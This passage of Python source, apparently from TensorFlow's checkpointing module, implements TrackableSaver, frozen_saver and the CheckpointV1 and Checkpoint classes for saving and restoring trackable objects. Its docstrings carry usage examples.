v1_saver_lib.Saver(saveables).restore(
sess=session, save_path=self._checkpoint.save_path)
def initialize_or_restore(self, session=None):
"""Alias for `run_restore_ops`."""
self.run_restore_ops(session=session)
class _SessionWithFeedDictAdditions(session_lib.SessionInterface):
"""Pretends to be a session, inserts extra feeds on run()."""
def __init__(self, session, feed_additions):
self._wrapped_session = session
self._feed_additions = feed_additions
def run(self, fetches, feed_dict=None, **kwargs):
if feed_dict is None:
feed_dict = {}
else:
feed_dict = feed_dict.copy()
feed_dict.update(self._feed_additions)
return self._wrapped_session.run(
fetches=fetches, feed_dict=feed_dict, **kwargs)
class TrackableSaver(object):
"""Saves and restores a `Trackable` object and its dependencies.
See `Trackable` for details of dependency management. `Saver` wraps
`tf.compat.v1.train.Saver` for saving, including extra information about the
graph of dependencies between Python objects. When restoring, it uses this
information about the save-time dependency graph to more robustly match
objects with their checkpointed values. When executing eagerly, it supports
restoring variables
on object creation (see `Saver.restore`).
Values in a checkpoint are mapped to `Trackable` Python objects
(`Variable`s, `Optimizer`s, `Layer`s) based on the names provided when the
checkpoint was written. To avoid breaking existing checkpoints when modifying
a class, dependency names (the names of attributes to which `Trackable`
objects are assigned) may not change. These names are local to objects, in
contrast to the `Variable.name`-based save/restore from
`tf.compat.v1.train.Saver`, and
so allow additional program transformations.
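A minimal usage sketch (assuming a trackable `root` object; the
`ObjectGraphView` wrapper is the one used throughout this module):
```python
saver = TrackableSaver(graph_view_lib.ObjectGraphView(root))
path = saver.save("/tmp/ckpt")
saver.restore(path).assert_consumed()
```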
"""
def __init__(self, graph_view):
"""Configure saving.
Args:
graph_view: An `ObjectGraphView` object containing a description of the
object graph to save.
"""
self._graph_view = graph_view
# The following attributes are used when graph building.
# Saveables caching: A dictionary mapping `Trackable` objects ->
# attribute names -> SaveableObjects, used to avoid re-creating
# SaveableObjects when graph building.
if context.executing_eagerly():
self._saveables_cache = None
else:
self._saveables_cache = object_identity.ObjectIdentityWeakKeyDictionary()
# The file prefix placeholder is created lazily when graph building (and not
# at all when executing eagerly) to avoid creating ops in the constructor
# (when they may never be necessary).
self._file_prefix_placeholder = None
# Op caching for save
self._object_graph_feed_tensor = None
self._last_save_object_graph = None
self._file_prefix_feed_tensor = None
self._cached_save_operation = None
# Op caching for restore, shared between _CheckpointRestoreCoordinators
self._restore_op_cache = {}
def _gather_saveables(self, object_graph_tensor=None):
"""Wraps _serialize_object_graph to include the object graph proto."""
named_saveable_objects, graph_proto, feed_additions, registered_savers = (
util.serialize_object_graph_with_registered_savers(
self._graph_view, self._saveables_cache))
if object_graph_tensor is None:
with ops.device("/cpu:0"):
object_graph_tensor = constant_op.constant(
graph_proto.SerializeToString(), dtype=dtypes.string)
else:
feed_additions.update(
{object_graph_tensor: graph_proto.SerializeToString()})
assert base.OBJECT_GRAPH_PROTO_KEY not in named_saveable_objects
named_saveable_objects.append(
base.NoRestoreSaveable(
tensor=object_graph_tensor, name=base.OBJECT_GRAPH_PROTO_KEY))
return (named_saveable_objects, graph_proto, feed_additions,
registered_savers)
def _save_cached_when_graph_building(self,
file_prefix,
object_graph_tensor,
options,
update_ckpt_state=False):
"""Create or retrieve save ops.
Args:
file_prefix: The prefix for saved checkpoint files.
object_graph_tensor: A `Tensor` to which the current object graph will be
fed.
options: `CheckpointOptions` object.
update_ckpt_state: Optional bool flag. Indicates whether the internal
checkpoint state needs to be updated.
Returns:
A two-element tuple with a filename tensor and a feed_dict of tensors to
feed when running it (if graph building). The feed dict contains the
current object graph and any Python state to be saved in the
checkpoint. When executing eagerly only the first argument is meaningful.
"""
(named_saveable_objects, graph_proto, feed_additions,
registered_savers) = self._gather_saveables(
object_graph_tensor=object_graph_tensor)
def _run_save():
"""Create and execute the SaveOp for the checkpoint."""
if (self._last_save_object_graph != graph_proto
# When executing eagerly, we need to re-create SaveableObjects each
# time save() is called so they pick up new Tensors passed to their
# constructors. That means the Saver needs to be copied with a new
# var_list.
or context.executing_eagerly() or ops.inside_function()):
saver = functional_saver.MultiDeviceSaver(named_saveable_objects,
registered_savers)
save_op = saver.save(file_prefix, options=options)
with ops.device("/cpu:0"):
with ops.control_dependencies([save_op]):
self._cached_save_operation = array_ops.identity(file_prefix)
self._last_save_object_graph = graph_proto
return self._cached_save_operation, feed_additions
def _copy_tensors():
"""Copy the tensors to the host CPU device."""
for saveable in named_saveable_objects:
# Pin the device according to the SaveableObject's device location to
# avoid unnecessary data copies when reading the variables. This is
# aligned with the behavior in MultiDeviceSaver.save().
original_device = saveable.device
with ops.device(original_device):
for spec in saveable.specs:
tensor = spec.tensor
device = spec.device
if tensor is not None:
with ops.device(saveable_object_util.set_cpu0(device)):
spec._tensor = array_ops.identity(tensor) # pylint: disable=protected-access
# Modify the device info accordingly now that the tensors are
# copied to the host CPU device.
spec.device = saveable_object_util.set_cpu0(device)
def _async_save_fn():
"""The thread function for executing async checkpoint save."""
with context.executor_scope(
executor.new_executor(
enable_async=False, enable_streaming_enqueue=False)):
_run_save()
# Update the internal checkpoint state if the checkpoint event is
# triggered from Checkpoint.save().
if update_ckpt_state:
_update_checkpoint_state_internal(
_convert_file_name_tensor_to_string(file_prefix))
if options.experimental_enable_async_checkpoint:
# Execute async-checkpoint.
# Step-1: Explicitly copy the tensors to their host CPU device.
_copy_tensors()
# Step-2: Execute the rest of the checkpoint operations on the host device
# using an async executor.
global _ASYNC_CHECKPOINT_THREAD
if _ASYNC_CHECKPOINT_THREAD is not None:
_ASYNC_CHECKPOINT_THREAD.join()
_ASYNC_CHECKPOINT_THREAD = threading.Thread(target=_async_save_fn)
_ASYNC_CHECKPOINT_THREAD.start()
# Step-3: Return the expected checkpoint file path though the save op may
# not have finished.
self._cached_save_operation = file_prefix
return self._cached_save_operation, feed_additions
# Execute the normal checkpoint, i.e., synchronous.
return _run_save()
def save(self, file_prefix, checkpoint_number=None, session=None,
options=None, update_ckpt_state=False):
"""Save a training checkpoint.
The saved checkpoint includes variables created by this object and any
Trackable objects it depends on at the time `Saver.save()` is called.
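A short sketch of numbered checkpoints (assuming eager execution and an
existing `TrackableSaver` named `saver`):
```python
path = saver.save("/tmp/ckpt", checkpoint_number=1)  # writes "/tmp/ckpt-1"
```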
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix). Names are generated based on this
prefix and `checkpoint_number`, if provided.
checkpoint_number: An integer variable or Tensor, used to number
checkpoints. Typically this value is saved along with other variables in
training checkpoints, which will happen automatically if it was created
by `root_trackable` or one of its dependencies (via
`Trackable._add_variable`).
session: The session to evaluate variables in. Ignored when executing
eagerly. If not provided when graph building, the default session is
used.
options: Optional `tf.train.CheckpointOptions` object.
update_ckpt_state: Optional bool flag. Indicates whether the internal
checkpoint state needs to be updated. Set this to True only if calling
from tf.train.Checkpoint.save() to enable updating the checkpoint state.
By default this is set to False, i.e., not updating checkpoint state.
Returns:
The full path to the checkpoint.
"""
options = options or checkpoint_options.CheckpointOptions()
feed_dict = {}
use_session = (not context.executing_eagerly() and
not ops.inside_function())
if checkpoint_number:
file_prefix = "%s-%d" % (file_prefix, checkpoint_number)
if use_session:
if self._object_graph_feed_tensor is None:
with ops.device("/cpu:0"):
self._object_graph_feed_tensor = constant_op.constant(
"", dtype=dtypes.string)
self._file_prefix_feed_tensor = constant_op.constant(
"", dtype=dtypes.string)
object_graph_tensor = self._object_graph_feed_tensor
file_prefix_tensor = self._file_prefix_feed_tensor
feed_dict[file_prefix_tensor] = file_prefix
else:
with ops.device("/cpu:0"):
file_prefix_tensor = ops.convert_to_tensor(
file_prefix, dtype=dtypes.string)
object_graph_tensor = None
if not tensor_util.is_tensor(file_prefix):
file_io.recursive_create_dir(os.path.dirname(file_prefix))
save_path, new_feed_additions = self._save_cached_when_graph_building(
file_prefix_tensor, object_graph_tensor, options, update_ckpt_state)
if new_feed_additions:
feed_dict.update(new_feed_additions)
if not use_session:
session = None
elif session is None:
session = get_session()
if session:
return session.run(save_path, feed_dict=feed_dict)
else:
return save_path
def restore(self, save_path, options=None):
"""Restore a training checkpoint.
Restores `root_trackable` and any objects that it tracks
(transitive). Either assigns values immediately if variables to restore have
been created already, or defers restoration until the variables are
created. Dependencies added to the `root_trackable` passed to the
constructor after this call will be matched if they have a corresponding
object in the checkpoint.
When building a graph, restorations are added to the graph but not run.
```python
saver = Saver(root)
saver.restore(path)
```
To ensure that loading is complete and no more deferred restorations will
take place, you can use the `assert_consumed()` method of the status object
returned by the `restore` call.
The assert will raise an exception unless every object was matched and all
checkpointed values have a matching variable object.
```python
saver = Saver(root)
saver.restore(path).assert_consumed()
```
When graph building, `assert_consumed()` indicates that all of the restore
ops which will be created for this checkpoint have been created. They can be
run via the `run_restore_ops()` function of the status object:
```python
saver.restore(path).assert_consumed().run_restore_ops()
```
If the checkpoint has not been consumed completely, then the list of restore
ops will grow as more objects are added to the dependency graph.
Name-based `tf.compat.v1.train.Saver` checkpoints can be loaded using this
method. There is no deferred loading, and names are used to match
variables. No restore ops are created/run until `run_restore_ops()` or
`initialize_or_restore()` are called on the returned status object, even
when executing eagerly. Re-encode name-based checkpoints using this
object-based `Saver.save` as soon as possible.
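A sketch for that name-based case (graph mode assumed):
```python
status = saver.restore("/path/to/name_based_checkpoint")
with tf.compat.v1.Session() as session:
  status.initialize_or_restore(session)
```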
Args:
save_path: The path to the checkpoint, as returned by `save` or
`tf.train.latest_checkpoint`. If None (as when there is no latest
checkpoint for `tf.train.latest_checkpoint` to return), returns an
object which may run initializers for objects in the dependency graph.
If the checkpoint was written by the name-based
`tf.compat.v1.train.Saver`, names are used to match variables.
options: Optional `tf.train.CheckpointOptions` object.
Returns:
A load status object, which can be used to make assertions about the
status of checkpoint restoration and run initialization/restore ops
(of type `CheckpointLoadStatus`, or `InitializationOnlyStatus` if
`save_path` is `None`).
If `save_path` points to a name-based checkpoint, a `NameBasedSaverStatus`
object is returned which runs restore ops from a name-based saver.
Raises:
RuntimeError: When a checkpoint file saved by async checkpoint is not
available upon restore().
"""
options = options or checkpoint_options.CheckpointOptions()
if save_path is None:
return InitializationOnlyStatus(self._graph_view, ops.uid())
# Wait for any ongoing checkpoint save to finish.
# TODO(chienchunh): Allow loading the file while other checkpoint events
# are still ongoing. Need to add a timeout mechanism along
# with conditional variables to notify when the checkpoint
# file is ready.
global _ASYNC_CHECKPOINT_THREAD
if _ASYNC_CHECKPOINT_THREAD is not None:
_ASYNC_CHECKPOINT_THREAD.join()
reader = py_checkpoint_reader.NewCheckpointReader(save_path)
graph_building = not context.executing_eagerly()
if graph_building:
dtype_map = None
else:
dtype_map = reader.get_variable_to_dtype_map()
try:
object_graph_string = reader.get_tensor(base.OBJECT_GRAPH_PROTO_KEY)
except errors_impl.NotFoundError:
# The object graph proto does not exist in this checkpoint. Try the
# name-based compatibility mode.
restore_coordinator = _NameBasedRestoreCoordinator(
save_path=save_path,
dtype_map=dtype_map)
if not graph_building:
for existing_trackable in util.list_objects(self._graph_view):
# pylint: disable=protected-access
existing_trackable._maybe_initialize_trackable()
existing_trackable._name_based_restores.add(restore_coordinator)
existing_trackable._name_based_attribute_restore(restore_coordinator)
# pylint: enable=protected-access
return NameBasedSaverStatus(
restore_coordinator,
object_graph_view=self._graph_view)
if graph_building:
if self._file_prefix_placeholder is None:
with ops.device("/cpu:0"):
self._file_prefix_placeholder = constant_op.constant("model")
file_prefix_tensor = self._file_prefix_placeholder
file_prefix_feed_dict = {self._file_prefix_placeholder: save_path}
else:
with ops.device("/cpu:0"):
file_prefix_tensor = constant_op.constant(save_path)
file_prefix_feed_dict = None
object_graph_proto = (trackable_object_graph_pb2.TrackableObjectGraph())
object_graph_proto.ParseFromString(object_graph_string)
checkpoint = _CheckpointRestoreCoordinator(
object_graph_proto=object_graph_proto,
save_path=save_path,
save_path_tensor=file_prefix_tensor,
reader=reader,
restore_op_cache=self._restore_op_cache,
graph_view=self._graph_view,
options=options,
saveables_cache=self._saveables_cache)
base.CheckpointPosition(
checkpoint=checkpoint, proto_id=0).restore(self._graph_view.root)
# Attached dependencies are not attached to the root, so should be restored
# separately.
if self._graph_view.attached_dependencies:
for ref in self._graph_view.attached_dependencies:
if ref.name == "root":
# Root dependency is automatically added to attached dependencies --
# this can be ignored since it maps back to the root object.
continue
proto_id = None
# Find proto ID of attached dependency (if it is in the proto).
for proto_ref in object_graph_proto.nodes[0].children:
if proto_ref.local_name == ref.name:
proto_id = proto_ref.node_id
break
if proto_id in checkpoint.object_by_proto_id:
# Object has already been restored. This can happen when there's an
# indirect connection from the attached object to the root.
continue
if proto_id is None:
# Could not find attached dependency in proto.
continue
base.CheckpointPosition(
checkpoint=checkpoint, proto_id=proto_id).restore(ref.ref)
load_status = CheckpointLoadStatus(
checkpoint,
graph_view=self._graph_view,
feed_dict=file_prefix_feed_dict)
return load_status
def frozen_saver(root_trackable):
"""Creates a static `tf.compat.v1.train.Saver` from a trackable object.
The returned `Saver` saves object-based checkpoints, but these checkpoints
will no longer reflect structural changes to the object graph, only changes to
the values of `Variable`s added as dependencies of the root object before
`freeze` was called.
`restore` works on the returned `Saver`, but requires that the object graph of
the checkpoint being loaded exactly matches the object graph when `freeze` was
called. This is in contrast to the object-based restore performed by
`tf.train.Checkpoint` which attempts a fuzzy matching between a checkpoint's
object graph and the current Python object graph.
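A minimal sketch (assuming eager execution and a trackable `root`):
```python
saver = frozen_saver(root)
saver.save("/tmp/frozen-ckpt")  # structure is frozen at creation time
```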
Args:
root_trackable: A trackable object to save.
Returns:
A saver which saves object-based checkpoints for the object graph frozen at
the time `frozen_saver` was called.
"""
named_saveable_objects, registered_savers = (
util.frozen_saveables_and_savers(
graph_view_lib.ObjectGraphView(root_trackable)))
return functional_saver.MultiDeviceSaver(named_saveable_objects,
registered_savers)
def _assert_trackable(obj, name):
if not isinstance(
obj, (base.Trackable, def_function.Function)):
raise ValueError(
f"`Checkpoint` was expecting {name} to be a trackable object (an "
f"object derived from `Trackable`), got {obj}. If you believe this "
"object should be trackable (i.e. it is part of the "
"TensorFlow Python API and manages state), please open an issue.")
def _update_checkpoint_state_internal(file_path):
"""Update internal checkpoint state."""
checkpoint_management.update_checkpoint_state_internal(
save_dir=os.path.dirname(file_path),
model_checkpoint_path=file_path,
all_model_checkpoint_paths=[file_path],
save_relative_paths=True)
def _convert_file_name_tensor_to_string(tensor):
"""Convert file name tensor to string."""
output = tensor
if tensor_util.is_tf_type(output):
# Convert to numpy if not `tf.function` building.
if context.executing_eagerly():
output = compat.as_str(output.numpy())
else:
# Graph + Session, so we already session.ran it.
output = compat.as_str(output)
return output
# Mentions graph building / Sessions. The v2 version is below.
@tf_export(v1=["train.Checkpoint"])
class CheckpointV1(autotrackable.AutoTrackable):
"""Groups trackable objects, saving and restoring them.
`Checkpoint`'s constructor accepts keyword arguments whose values are types
that contain trackable state, such as `tf.compat.v1.train.Optimizer`
implementations, `tf.Variable`, `tf.keras.Layer` implementations, or
`tf.keras.Model` implementations. It saves these values with a checkpoint, and
maintains a `save_counter` for numbering checkpoints.
Example usage when graph building:
```python
import tensorflow as tf
import os
checkpoint_directory = "/tmp/training_checkpoints"
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model)
status = checkpoint.restore(tf.train.latest_checkpoint(checkpoint_directory))
train_op = optimizer.minimize( ... )
status.assert_consumed() # Optional sanity checks.
with tf.compat.v1.Session() as session:
# Use the Session to restore variables, or initialize them if
# tf.train.latest_checkpoint returned None.
status.initialize_or_restore(session)
for _ in range(num_training_steps):
session.run(train_op)
checkpoint.save(file_prefix=checkpoint_prefix)
```
Example usage with eager execution enabled:
```python
import tensorflow as tf
import os
tf.compat.v1.enable_eager_execution()
checkpoint_directory = "/tmp/training_checkpoints"
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model)
status = checkpoint.restore(tf.train.latest_checkpoint(checkpoint_directory))
for _ in range(num_training_steps):
optimizer.minimize( ... ) # Variables will be restored on creation.
status.assert_consumed() # Optional sanity checks.
checkpoint.save(file_prefix=checkpoint_prefix)
```
`Checkpoint.save` and `Checkpoint.restore` write and read object-based
checkpoints, in contrast to `tf.compat.v1.train.Saver` which writes and reads
`variable.name` based checkpoints. Object-based checkpointing saves a graph of
dependencies between Python objects (`Layer`s, `Optimizer`s, `Variable`s,
etc.) with named edges, and this graph is used to match variables when
restoring a checkpoint. It can be more robust to changes in the Python
program, and helps to support restore-on-create for variables when executing
eagerly. Prefer `tf.train.Checkpoint` over `tf.compat.v1.train.Saver` for new
code.
`Checkpoint` objects have dependencies on the objects passed as keyword
arguments to their constructors, and each dependency is given a name that is
identical to the name of the keyword argument for which it was created.
TensorFlow classes like `Layer`s and `Optimizer`s will automatically add
dependencies on their variables (e.g. "kernel" and "bias" for
`tf.keras.layers.Dense`). Inheriting from `tf.keras.Model` makes managing
dependencies easy in user-defined classes, since `Model` hooks into attribute
assignment. For example:
```python
class Regress(tf.keras.Model):
def __init__(self):
super(Regress, self).__init__()
self.input_transform = tf.keras.layers.Dense(10)
# ...
def call(self, inputs):
x = self.input_transform(inputs)
# ...
```
This `Model` has a dependency named "input_transform" on its `Dense` layer,
which in turn depends on its variables. As a result, saving an instance of
`Regress` using `tf.train.Checkpoint` will also save all the variables created
by the `Dense` layer.
When variables are assigned to multiple workers, each worker writes its own
section of the checkpoint. These sections are then merged/re-indexed to behave
as a single checkpoint. This avoids copying all variables to one worker, but
does require that all workers see a common filesystem.
While `tf.keras.Model.save_weights` and `tf.train.Checkpoint.save` save in the
same format, note that the root of the resulting checkpoint is the object the
save method is attached to. This means saving a `tf.keras.Model` using
`save_weights` and loading into a `tf.train.Checkpoint` with a `Model`
attached (or vice versa) will not match the `Model`'s variables. See the
[guide to training
checkpoints](https://www.tensorflow.org/guide/checkpoint) for
details. Prefer `tf.train.Checkpoint` over `tf.keras.Model.save_weights` for
training checkpoints.
Attributes:
save_counter: Incremented when `save()` is called. Used to number
checkpoints.
"""
def __init__(self, **kwargs):
"""Group objects into a training checkpoint.
Args:
**kwargs: Keyword arguments are set as attributes of this object, and are
saved with the checkpoint. Values must be trackable objects.
Raises:
ValueError: If objects in `kwargs` are not trackable.
"""
super(CheckpointV1, self).__init__()
global _END_TIME_OF_LAST_WRITE
with _END_TIME_OF_LAST_WRITE_LOCK:
if _END_TIME_OF_LAST_WRITE is None:
_END_TIME_OF_LAST_WRITE = time.time()
for k, v in sorted(kwargs.items(), key=lambda item: item[0]):
setattr(self, k, v)
if not isinstance(
getattr(self, k), (base.Trackable, def_function.Function)):
raise ValueError(
"`Checkpoint` was expecting a trackable object (an object "
f"derived from `Trackable`), got {v}. If you believe this "
"object should be trackable (i.e. it is part of the "
"TensorFlow Python API and manages state), please open an issue.")
self._save_counter = None # Created lazily for restore-on-create.
self._save_assign_op = None
self._saver = TrackableSaver(graph_view_lib.ObjectGraphView(self))
def _maybe_create_save_counter(self):
"""Create a save counter if it does not yet exist."""
if self._save_counter is None:
# Initialized to 0 and incremented before saving.
with ops.device("/cpu:0"):
# add_variable creates a dependency named "save_counter"; NoDependency
# prevents creating a second dependency named "_save_counter".
self._save_counter = data_structures.NoDependency(
add_variable(
self,
name="save_counter",
initializer=0,
dtype=dtypes.int64,
trainable=False))
def write(self, file_prefix, session=None):
"""Writes a training checkpoint.
The checkpoint includes variables created by this object and any
trackable objects it depends on at the time `Checkpoint.write()` is
called.
`write` does not number checkpoints, increment `save_counter`, or update the
metadata used by `tf.train.latest_checkpoint`. It is primarily intended for
use by higher level checkpoint management utilities. `save` provides a very
basic implementation of these features.
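A minimal sketch (assuming eager execution is enabled):
```python
tf.compat.v1.enable_eager_execution()
checkpoint = tf.compat.v1.train.Checkpoint(v=tf.Variable(1.))
path = checkpoint.write("/tmp/ckpt")  # returns "/tmp/ckpt"
```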
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix).
session: The session to evaluate variables in. Ignored when executing
eagerly. If not provided when graph building, the default session is
used.
Returns:
The full path to the checkpoint (i.e. `file_prefix`).
"""
start_time = time.time()
output = self._saver.save(file_prefix=file_prefix, session=session)
end_time = time.time()
metrics.AddCheckpointWriteDuration(
api_label=_CHECKPOINT_V1,
microseconds=_get_duration_microseconds(start_time, end_time))
global _END_TIME_OF_LAST_WRITE
with _END_TIME_OF_LAST_WRITE_LOCK:
metrics.AddTrainingTimeSaved(
api_label=_CHECKPOINT_V1,
microseconds=_get_duration_microseconds(_END_TIME_OF_LAST_WRITE,
end_time))
_END_TIME_OF_LAST_WRITE = end_time
if tensor_util.is_tf_type(output):
# Convert to numpy if not `tf.function` building.
if context.executing_eagerly():
output = compat.as_str(output.numpy())
else:
# Graph + Session, so we already session.ran it.
output = compat.as_str(output)
metrics.RecordCheckpointSize(
api_label=_CHECKPOINT_V1, filesize=_get_checkpoint_size(output))
return output
@property
def save_counter(self):
"""An integer variable which starts at zero and is incremented on save.
Used to number checkpoints.
Returns:
The save counter variable.
"""
self._maybe_create_save_counter()
return self._save_counter
def save(self, file_prefix, session=None):
"""Saves a training checkpoint and provides basic checkpoint management.
The saved checkpoint includes variables created by this object and any
trackable objects it depends on at the time `Checkpoint.save()` is
called.
`save` is a basic convenience wrapper around the `write` method,
sequentially numbering checkpoints using `save_counter` and updating the
metadata used by `tf.train.latest_checkpoint`. More advanced checkpoint
management, for example garbage collection and custom numbering, may be
provided by other utilities which also wrap `write`
(`tf.train.CheckpointManager` for example).
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix). Names are generated based on this
prefix and `Checkpoint.save_counter`.
session: The session to evaluate variables in. Ignored when executing
eagerly. If not provided when graph building, the default session is
used.
Returns:
The full path to the checkpoint.
"""
graph_building = not context.executing_eagerly()
if graph_building:
if ops.inside_function():
raise NotImplementedError(
"Calling tf.train.Checkpoint.save() from a function is not "
"supported, as save() modifies saving metadata in ways not "
"supported by TensorFlow Operations. Consider using "
"tf.train.Checkpoint.write(), a lower-level API which does not "
"update metadata. tf.train.latest_checkpoint and related APIs will "
"not see this checkpoint.")
if session is None:
session = get_session()
if self._save_counter is None:
# When graph building, if this is a new save counter variable then it
# needs to be initialized before assign_add. This is only an issue if
# restore() has not been called first.
session.run(self.save_counter.initializer)
if not graph_building or self._save_assign_op is None:
with ops.colocate_with(self.save_counter):
assign_op = self.save_counter.assign_add(1, read_value=True)
if graph_building:
self._save_assign_op = data_structures.NoDependency(assign_op)
if graph_building:
checkpoint_number = session.run(self._save_assign_op)
else:
checkpoint_number = assign_op.numpy()
file_path = self.write(
"%s-%d" % (file_prefix, checkpoint_number), session=session)
checkpoint_management.update_checkpoint_state_internal(
save_dir=os.path.dirname(file_prefix),
model_checkpoint_path=file_path,
all_model_checkpoint_paths=[file_path],
save_relative_paths=True)
return file_path
def restore(self, save_path):
"""Restore a training checkpoint.
Restores this `Checkpoint` and any objects it depends on.
When executing eagerly, either assigns values immediately if variables to
restore have been created already, or defers restoration until the variables
are created. Dependencies added after this call will be matched if they have
a corresponding object in the checkpoint (the restore request will queue in
any trackable object waiting for the expected dependency to be added).
When graph building, restoration ops are added to the graph but not run
immediately.
```python
checkpoint = tf.train.Checkpoint( ... )
checkpoint.restore(path)
```
To ensure that loading is complete and no more deferred restorations will
take place, you can use the `assert_consumed()` method of the status object
returned by `restore`.
The assert will raise an exception if any Python objects in the dependency
graph were not found in the checkpoint, or if any checkpointed values do not
have a matching Python object:
```python
checkpoint = tf.train.Checkpoint( ... )
checkpoint.restore(path).assert_consumed()
```
When graph building, `assert_consumed()` indicates that all of the restore
ops that will be created for this checkpoint have been created. They can be
run via the `run_restore_ops()` method of the status object:
```python
checkpoint.restore(path).assert_consumed().run_restore_ops()
```
If the checkpoint has not been consumed completely, then the list of restore
ops will grow as more objects are added to the dependency graph.
To check that all variables in the Python object have restored values from
checkpoint, use `assert_existing_objects_matched()`. This assertion is
useful when called after the variables in your graph have been created.
Name-based `tf.compat.v1.train.Saver` checkpoints can be loaded using this
method. Names are used to match variables. No restore ops are created/run
until `run_restore_ops()` or `initialize_or_restore()` are called on the
returned status object when graph building, but there is restore-on-creation
when executing eagerly. Re-encode name-based checkpoints using
`tf.train.Checkpoint.save` as soon as possible.
Args:
save_path: The path to the checkpoint, as returned by `save` or
`tf.train.latest_checkpoint`. If None (as when there is no latest
checkpoint for `tf.train.latest_checkpoint` to return), returns an
object which may run initializers for objects in the dependency graph.
If the checkpoint was written by the name-based
`tf.compat.v1.train.Saver`, names are used to match variables.
Returns:
A load status object, which can be used to make assertions about the
status of a checkpoint restoration and run initialization/restore ops.
The returned status object has the following methods:
* `assert_consumed()`:
Raises an exception if any variables are unmatched: either
checkpointed values which don't have a matching Python object or
Python objects in the dependency graph with no values in the
checkpoint. This method returns the status object, and so may be
chained with `initialize_or_restore` or `run_restore_ops`.
* `assert_existing_objects_matched()`:
Raises an exception if any existing Python objects in the dependency
graph are unmatched. Unlike `assert_consumed`, this assertion will
pass if values in the checkpoint have no corresponding Python
objects. For example a `tf.keras.Layer` object which has not yet been
built, and so has not created any variables, will pass this assertion
but will fail `assert_consumed`. Useful when loading part of a larger
checkpoint into a new Python program, e.g. a training checkpoint with
a `tf.compat.v1.train.Optimizer` was saved but only the state required
for inference is being loaded. This method returns the status object,
and so may be chained with `initialize_or_restore` or
`run_restore_ops`.
* `assert_nontrivial_match()`: Asserts that something aside from the root
object was matched. This is a very weak assertion, but is useful for
sanity checking in library code where objects may exist in the
checkpoint which haven't been created in Python and some Python
objects may not have a checkpointed value.
* `expect_partial()`: Silence warnings about incomplete checkpoint
restores. Warnings are otherwise printed for unused parts of the
checkpoint file or object when the `Checkpoint` object is deleted
(often at program shutdown).
* `initialize_or_restore(session=None)`:
When graph building, runs variable initializers if `save_path` is
`None`, but otherwise runs restore operations. If no `session` is
explicitly specified, the default session is used. No effect when
executing eagerly (variables are initialized or restored eagerly).
* `run_restore_ops(session=None)`:
When graph building, runs restore operations. If no `session` is
explicitly specified, the default session is used. No effect when
executing eagerly (restore operations are run eagerly). May only be
called when `save_path` is not `None`.
"""
start_time = time.time()
status = self._saver.restore(save_path=save_path)
# Create the save counter now so it gets initialized with other variables
# when graph building. Creating it earlier would lead to errors when using,
# say, train.Saver() to save the model before initializing it.
self._maybe_create_save_counter()
if isinstance(status, NameBasedSaverStatus):
status.add_to_optionally_restored(self.save_counter)
metrics.AddCheckpointReadDuration(
api_label=_CHECKPOINT_V1,
microseconds=_get_duration_microseconds(start_time, time.time()))
return status
@tf_export("train.Checkpoint", v1=[])
class Checkpoint(autotrackable.AutoTrackable):
"""Manages saving/restoring trackable values to disk.
TensorFlow objects may contain trackable state, such as `tf.Variable`s,
`tf.keras.optimizers.Optimizer` implementations, `tf.data.Dataset` iterators,
`tf.keras.Layer` implementations, or `tf.keras.Model` implementations.
These are called **trackable objects**.
A `Checkpoint` object can be constructed to save either a single or group of
trackable objects to a checkpoint file. It maintains a `save_counter` for
numbering checkpoints.
Example:
```python
model = tf.keras.Model(...)
checkpoint = tf.train.Checkpoint(model)
# Save a checkpoint to /tmp/training_checkpoints-{save_counter}. Every time
# checkpoint.save is called, the save counter is increased.
save_path = checkpoint.save('/tmp/training_checkpoints')
# Restore the checkpointed values to the `model` object.
checkpoint.restore(save_path)
```
Example 2:
```python
import tensorflow as tf
import os
checkpoint_directory = "/tmp/training_checkpoints"
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
# Create a Checkpoint that will manage two objects with trackable state,
# one we name "optimizer" and the other we name "model".
checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model)
status = checkpoint.restore(tf.train.latest_checkpoint(checkpoint_directory))
for _ in range(num_training_steps):
optimizer.minimize( ... ) # Variables will be restored on creation.
status.assert_consumed() # Optional sanity checks.
checkpoint.save(file_prefix=checkpoint_prefix)
```
`Checkpoint.save()` and `Checkpoint.restore()` write and read object-based
checkpoints, in contrast to TensorFlow 1.x's `tf.compat.v1.train.Saver`, which
writes and reads `variable.name`-based checkpoints. Object-based
checkpointing saves a
graph of dependencies between Python objects (`Layer`s, `Optimizer`s,
`Variable`s, etc.) with named edges, and this graph is used to match variables
when restoring a checkpoint. It can be more robust to changes in the Python
program, and helps to support restore-on-create for variables.
`Checkpoint` objects have dependencies on the objects passed as keyword
arguments to their constructors, and each dependency is given a name that is
identical to the name of the keyword argument for which it was created.
TensorFlow classes like `Layer`s and `Optimizer`s will automatically add
dependencies on their own variables (e.g. "kernel" and "bias" for
`tf.keras.layers.Dense`). Inheriting from `tf.keras.Model` makes managing
dependencies easy in user-defined classes, since `Model` hooks into attribute
assignment. For example:
```python
class Regress(tf.keras.Model):
def __init__(self):
super(Regress, self).__init__()
self.input_transform = tf.keras.layers.Dense(10)
# ...
def call(self, inputs):
x = self.input_transform(inputs)
# ...
```
This `Model` has a dependency named "input_transform" on its `Dense` layer,
which in turn depends on its variables. As a result, saving an instance of
`Regress` using `tf.train.Checkpoint` will also save all the variables created
by the `Dense` layer.
When variables are assigned to multiple workers, each worker writes its own
section of the checkpoint. These sections are then merged/re-indexed to behave
as a single checkpoint. This avoids copying all variables to one worker, but
does require that all workers see a common filesystem.
This function differs slightly from the Keras Model `save_weights` function.
`tf.keras.Model.save_weights` creates a checkpoint file with the name
specified in `filepath`, while `tf.train.Checkpoint` numbers the checkpoints,
using `filepath` as the prefix for the checkpoint file names. Aside from this,
`model.save_weights()` and `tf.train.Checkpoint(model).save()` are equivalent.
See the [guide to training
checkpoints](https://www.tensorflow.org/guide/checkpoint) for
details.
Attributes:
save_counter: Incremented when `save()` is called. Used to number
checkpoints.
"""
def __init__(self, root=None, **kwargs):
"""Creates a training checkpoint for a single or group of objects.
Args:
